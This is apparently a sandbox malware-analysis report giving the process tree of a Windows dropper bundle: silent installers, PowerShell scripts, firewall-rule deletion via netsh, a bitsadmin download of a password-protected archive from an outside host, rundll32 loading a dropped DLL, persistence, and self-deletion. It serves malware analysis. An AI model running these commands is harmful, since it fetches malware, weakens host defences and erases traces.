C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso7994.tmp\tempfile.ps1"15⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\khjyxiaa.j3y\GcleanerWW.exe /mixone & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe subid=685 /verysilent & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exeC:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe subid=685 /verysilent14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HA8LS.tmp\libravpn_setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-HA8LS.tmp\libravpn_setup.tmp" /SL5="$1095C,11382886,1080320,C:\Users\Admin\AppData\Local\Temp\zl0vlbkg.1ph\libravpn_setup.exe" subid=685 /verysilent15⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\LibraVPN\LibraVPN.exe"C:\Program Files (x86)\LibraVPN\LibraVPN.exe"16⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND18⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_APP_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_RESOLUTION_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND17⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND17⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_LOCAL_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall delete rule name=OVS_ALLOW_VPN_INTERNET_ALL_OUTBOUND19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound18⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles firewallpolicy BlockInbound,AllowOutbound19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c ipconfig /flushdns17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c ipconfig /flushdns18⤵
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns19⤵
- Gathers network information
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im wireguard.exe17⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wireguard.exe18⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh wlan show interfaces > openvpn\dat\tmp_check_WiFi.dat17⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6796 -s 169217⤵
- Program crash
-
C:\Program Files (x86)\Data Finder\Versium Research\app.exe"C:\Program Files (x86)\Data Finder\Versium Research\app.exe"9⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\app.exe"C:\Program Files (x86)\Data Finder\Versium Research\app.exe"10⤵
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"9⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a10⤵
-
C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QV5OL.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-QV5OL.tmp\LabPicV3.tmp" /SL5="$30566,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-76I3R.tmp\12(((((.exe"C:\Users\Admin\AppData\Local\Temp\is-76I3R.tmp\12(((((.exe" /S /UID=lab21411⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Common Files\KLOTBEAUID\prolab.exe"C:\Program Files\Common Files\KLOTBEAUID\prolab.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QL72N.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-QL72N.tmp\prolab.tmp" /SL5="$505A4,575243,216576,C:\Program Files\Common Files\KLOTBEAUID\prolab.exe" /VERYSILENT13⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\79-01612-9df-7a4a7-34210b1edded5\Tuvuduloxa.exe"C:\Users\Admin\AppData\Local\Temp\79-01612-9df-7a4a7-34210b1edded5\Tuvuduloxa.exe"12⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\ff-9508d-e66-22aa0-f5366762714c6\Hyxixanicy.exe"C:\Users\Admin\AppData\Local\Temp\ff-9508d-e66-22aa0-f5366762714c6\Hyxixanicy.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cwmf3g4l.ika\GcleanerEU.exe /eufive & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4undjfq4.0xu\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe /Verysilent /subid=623 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe /Verysilent /subid=62314⤵
-
C:\Users\Admin\AppData\Local\Temp\is-POKCV.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-POKCV.tmp\Setup3310.tmp" /SL5="$20452,138429,56832,C:\Users\Admin\AppData\Local\Temp\j5kvrutv.4k2\Setup3310.exe" /Verysilent /subid=62315⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-J6D3D.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-J6D3D.tmp\Setup.exe" /Verysilent16⤵
- Drops file in Program Files directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exeC:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe"C:\Users\Admin\AppData\Local\Temp\5ixtjyth.sxj\google-game.exe" -a15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe14⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\qnnps1qk.1l3\toolspab1.exe15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\kybtrrnp.kvo\SunLabsPlayer.exe /S14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx15⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx16⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy784C.tmp\tempfile.ps1"15⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\50me53sj.iaw\GcleanerWW.exe /mixone & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe /8-2222 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exeC:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe /8-222214⤵
-
C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe"C:\Users\Admin\AppData\Local\Temp\ayfdiixw.yfh\app.exe" /8-222215⤵
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QV5OK.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-QV5OK.tmp\lylal220.tmp" /SL5="$20590,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-O8109.tmp\èeèrgegdè_éçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-O8109.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal22011⤵
-
C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe"C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe" /VERYSILENT12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1EBSN.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-1EBSN.tmp\irecord.tmp" /SL5="$30550,5808768,66560,C:\Program Files\Windows Defender\JIATZDBYSX\irecord.exe" /VERYSILENT13⤵
-
C:\Users\Admin\AppData\Local\Temp\cf-c0c77-214-defb3-f954a08ae9144\Bugyponoku.exe"C:\Users\Admin\AppData\Local\Temp\cf-c0c77-214-defb3-f954a08ae9144\Bugyponoku.exe"12⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\36-4fbd2-3d5-1d6ab-714269b081753\Maejumyromi.exe"C:\Users\Admin\AppData\Local\Temp\36-4fbd2-3d5-1d6ab-714269b081753\Maejumyromi.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wfu0eydc.aw3\GcleanerEU.exe /eufive & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hccycans.1ip\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe /Verysilent /subid=623 & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe /Verysilent /subid=62314⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AIC96.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-AIC96.tmp\Setup3310.tmp" /SL5="$20454,138429,56832,C:\Users\Admin\AppData\Local\Temp\bdhmb3sl.ou2\Setup3310.exe" /Verysilent /subid=62315⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-7BCOD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7BCOD.tmp\Setup.exe" /Verysilent16⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exeC:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe"C:\Users\Admin\AppData\Local\Temp\lk0mikgx.miv\google-game.exe" -a15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\iijiqfeq.5eg\toolspab1.exe15⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\vykdaeb1.opq\SunLabsPlayer.exe /S14⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"15⤵
-
[depth 15] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Windows\SysWOW64\bitsadmin.exe
    cmd: "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
    - Download via BitsAdmin
[depth 15] C:\Program Files (x86)\lighteningplayer\data_load.exe
    cmd: "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
    - Drops file in Program Files directory
[depth 15] C:\Program Files (x86)\lighteningplayer\data_load.exe
    cmd: "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
[depth 15] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Windows\SysWOW64\rundll32.exe
    cmd: C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
[depth 16] C:\Windows\system32\rundll32.exe
    cmd: C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
    - Drops file in System32 directory
[depth 15] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
[depth 15] C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
    cmd: "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
[depth 13] C:\Windows\System32\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\boxt0cpw.edg\GcleanerWW.exe /mixone & exit
[depth 9] C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
    cmd: "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
[depth 10] C:\Users\Admin\AppData\Roaming\6368462.exe
    cmd: "C:\Users\Admin\AppData\Roaming\6368462.exe"
[depth 10] C:\Users\Admin\AppData\Roaming\8933555.exe
    cmd: "C:\Users\Admin\AppData\Roaming\8933555.exe"
    - Suspicious behavior: SetClipboardViewer
[depth 10] C:\Users\Admin\AppData\Roaming\5617989.exe
    cmd: "C:\Users\Admin\AppData\Roaming\5617989.exe"
[depth 9] C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
    cmd: "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
[depth 10] C:\Windows\SysWOW64\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
[depth 11] C:\Windows\SysWOW64\taskkill.exe
    cmd: taskkill /im RunWW.exe /f
    - Kills process with taskkill
[depth 11] C:\Windows\SysWOW64\timeout.exe
    cmd: timeout /t 6
    - Delays execution with timeout.exe
[depth 5] C:\Windows\System32\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe & exit
[depth 6] C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe
[depth 7] C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe" -a
[depth 5] C:\Windows\System32\cmd.exe
    cmd: "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkswjkle.nxl\jhuuee.exe & exit
[depth 5] C:\Windows\System32\cmd.exe
